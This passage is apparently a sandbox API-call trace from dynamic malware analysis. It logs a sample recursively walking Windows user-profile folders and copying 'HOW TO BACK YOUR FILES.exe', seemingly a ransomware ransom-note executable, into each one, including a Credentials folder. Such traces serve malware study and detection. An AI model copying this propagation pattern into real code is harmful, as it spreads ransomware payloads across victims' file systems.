out: lpString1="\\*") returned="\\*" [0078.787] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5866cae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5866cae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.787] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.787] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.787] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0078.787] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0078.788] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.788] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.788] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.788] GetLastError () returned 0x0 [0078.788] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.788] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x586b8da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x586b8da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.789] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.789] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.789] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0078.789] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0078.789] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.789] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds cache\\kqmhsvkd\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.790] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.790] GetLastError () returned 0x0 [0078.790] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.790] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5872b1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5872b1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.790] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.790] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.790] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0078.790] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0078.791] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.791] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds cache\\d68g7bij\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.791] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.791] GetLastError () returned 0x0 [0078.791] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.791] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58777480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58777480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.792] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.792] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.792] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0078.792] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0078.792] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.792] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds cache\\6asvn7j7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.792] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.793] GetLastError () returned 0x0 [0078.793] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.793] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x587c3740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x587c3740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.793] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.793] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.793] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0078.793] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0078.793] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.793] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds cache\\1nbur4hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.794] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.794] GetLastError () returned 0x0 [0078.794] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.794] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5880fa00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5880fa00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.794] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.794] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.795] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" [0078.795] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" [0078.795] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.795] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.795] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.795] GetLastError () returned 0x0 [0078.796] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.796] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5880fa00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5880fa00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.796] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.796] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.796] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0078.796] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0078.796] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.796] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.797] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.797] GetLastError () returned 0x0 [0078.797] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.797] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.797] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.797] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.797] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0078.798] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0078.798] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.798] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.798] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.798] GetLastError () returned 0x0 [0078.799] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.799] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58881e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58881e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.799] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.799] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.799] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0078.799] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0078.799] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.799] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds\\microsoft feeds~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.800] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.800] GetLastError () returned 0x0 [0078.800] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.800] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58940500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58940500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.800] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.800] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.800] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" [0078.800] lstrcatW (in: 